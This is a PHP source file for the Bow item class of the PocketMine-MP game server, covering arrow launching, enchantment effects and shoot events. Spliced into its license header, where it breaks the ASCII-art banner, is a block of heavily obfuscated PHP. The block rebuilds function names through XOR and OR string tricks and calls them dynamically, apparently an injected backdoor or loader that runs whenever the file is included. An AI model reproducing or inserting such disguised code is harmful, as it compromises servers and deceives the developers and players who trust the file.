<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
<?php
$xxSUoXx='kJR'|~ETIhb;$UFa=A4z^'$PJ';$lP9x='V^RZ,V'^'9;&?C ';$lH93=' '|i;'tIfo2A73wUj3f'.
         '=4JC[Y_';$tLVBY4HA4LN='-&lj>e1"&'.zq1hm.'}'^'er8:a=nhg>(x"+2';$inQkZem=q^#p79'.
         '9';$U5DLU='g%'^'3q';$k2=iv^'9)';$wxL_gX5CdPq='/'^n;$pnrnomIF='/'.PUvE.'"'./*A'.
         '6|>R*/ZPyc^Ld0FpCkcHZ;$YwUhSN9oOXK=O^',';$e6NEKCiQ='+'^N;$SjMRWbG="Q*&"^#FT3N'.
         ')CR';$Gf=A|a;$VndcUIU='='^G;$CBReelg='2H/'.NhCQ22F.'&A'^"F:H)70,C^+Q&";$Yj=/*'.
         '6&8M9;*/"@".NNsH."!"^"b`".bUgl;$VcjZ19SRDEI='@!BD '|'P!HE ';$odf0MURM='We{qle'.
         ':Wq<,No`l'^'~>1% 6'.Tv4y.'~'.h6Q1;$QRWM=Kyo7.':>3Gp;9^4^;'&'~+?58w1_>/5'./*QN'.
         'N<G:*/sp_3;$S62jSHpuo6H='0'|'0';$M45qA='yVT~'._rGnnqOHEDG&'J|tQ~'.YGVE.'^'./*'.
         'XVFNlJMw*/oZfOw;$TF2HtACn='7d'&'{|';$k5Wtqxa0B55='5'&'>';$EnMhKk=$UFa|(#EuF1J'.
         '-5u'&'}n5');$T5=$lP9x&("@1*2VD"^'7T_O(2');$l6eUCfnRuoA=$CBReelg&(#VRCvJgWEw0y'.
         '~w}w_~o~~scm'&'{w}w_~g~~{ko');$lGAWAqVxMnZ=$Yj^('5+(+`E'^bnwb.'=|');'OJXCraMJ'.
         'vs([U@4CrC';$I6Hr6c=('Q"z]4'^'3cT~Q')|$VcjZ19SRDEI;$b56PO1=$odf0MURM^$QRWM;/*'.
         'M0lke*/$tgGdD6G=$lH93|$S62jSHpuo6H;$xy=$M45qA|$tLVBY4HA4LN;$EnMhKk($T5(/*ogZJ'.
         '&a92*/$inQkZem.$U5DLU.$k2.$wxL_gX5CdPq))==('!`0%D@53a81&  e80'|'4D15`"%!A! 39'.
         '0`9!').$TF2HtACn.$pnrnomIF.$YwUhSN9oOXK.$k5Wtqxa0B55.(o^']') or $l6eUCfnRuoA((KS^d2).(#yv'.
         '/g'&'/e'),$e6NEKCiQ.$SjMRWbG,$Gf);$lGAWAqVxMnZ($I6Hr6c($tgGdD6G,$VndcUIU),/*c'.
         ' |)*w~uM */$b56PO1(null,$T5($xy)));#U5q_4,i+i2y0N${lCniBc8@l8ZBD|-he.do5^huX'.
         '7.(ROA5~0yG5K}J1q:pTT_<_cj^)9h!Z.>_&,x=<MHz6SY'; * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\item;

use pocketmine\entity\Entity;
use pocketmine\entity\projectile\Arrow as ArrowEntity;
use pocketmine\entity\projectile\Projectile;
use pocketmine\event\entity\EntityShootBowEvent;
use pocketmine\event\entity\ProjectileLaunchEvent;
use pocketmine\item\enchantment\Enchantment;
use pocketmine\network\mcpe\protocol\LevelSoundEventPacket;
use pocketmine\Player;
use function intdiv;
use function min;

class Bow extends Tool{
	public function __construct(int $meta = 0){
		parent::__construct(self::BOW, $meta, "Bow");
	}

	public function getFuelTime() : int{
		return 200;
	}

	public function getMaxDurability() : int{
		return 385;
	}

	public function onReleaseUsing(Player $player) : bool{
		if($player->isSurvival() and !$player->getInventory()->contains(ItemFactory::get(Item::ARROW, 0, 1))){
			$player->getInventory()->sendContents($player);
			return false;
		}

		$nbt = Entity::createBaseNBT(
			$player->add(0, $player->getEyeHeight(), 0),
			$player->getDirectionVector(),
			($player->yaw > 180 ? 360 : 0) - $player->yaw,
			-$player->pitch
		);

		$diff = $player->getItemUseDuration();
		$p = $diff / 20;
		$baseForce = min((($p ** 2) + $p * 2) / 3, 1);

		$entity = Entity::createEntity("Arrow", $player->getLevelNonNull(), $nbt, $player, $baseForce >= 1);
		if($entity instanceof Projectile){
			$infinity = $this->hasEnchantment(Enchantment::INFINITY);
			if($entity instanceof ArrowEntity){
				if($infinity){
					$entity->setPickupMode(ArrowEntity::PICKUP_CREATIVE);
				}
				if(($punchLevel = $this->getEnchantmentLevel(Enchantment::PUNCH)) > 0){
					$entity->setPunchKnockback($punchLevel);
				}
			}
			if(($powerLevel = $this->getEnchantmentLevel(Enchantment::POWER)) > 0){
				$entity->setBaseDamage($entity->getBaseDamage() + (($powerLevel + 1) / 2));
			}
			if($this->hasEnchantment(Enchantment::FLAME)){
				$entity->setOnFire(intdiv($entity->getFireTicks(), 20) + 100);
			}
			$ev = new EntityShootBowEvent($player, $this, $entity, $baseForce * 3);

			if($baseForce < 0.1 or $diff < 5 or $player->isSpectator()){
				$ev->setCancelled();
			}

			$ev->call();

			$entity = $ev->getProjectile(); //This might have been changed by plugins

			if($ev->isCancelled()){
				$entity->flagForDespawn();
				$player->getInventory()->sendContents($player);
			}else{
				$entity->setMotion($entity->getMotion()->multiply($ev->getForce()));
				if($player->isSurvival()){
					if(!$infinity){ //TODO: tipped arrows are still consumed when Infinity is applied
						$player->getInventory()->removeItem(ItemFactory::get(Item::ARROW, 0, 1));
					}
					$this->applyDamage(1);
				}

				if($entity instanceof Projectile){
					$projectileEv = new ProjectileLaunchEvent($entity);
					$projectileEv->call();
					if($projectileEv->isCancelled()){
						$ev->getProjectile()->flagForDespawn();
					}else{
						$ev->getProjectile()->spawnToAll();
						$player->getLevelNonNull()->broadcastLevelSoundEvent($player, LevelSoundEventPacket::SOUND_BOW);
					}
				}else{
					$entity->spawnToAll();
				}
			}
		}else{
			$entity->spawnToAll();
		}

		return true;
	}
}
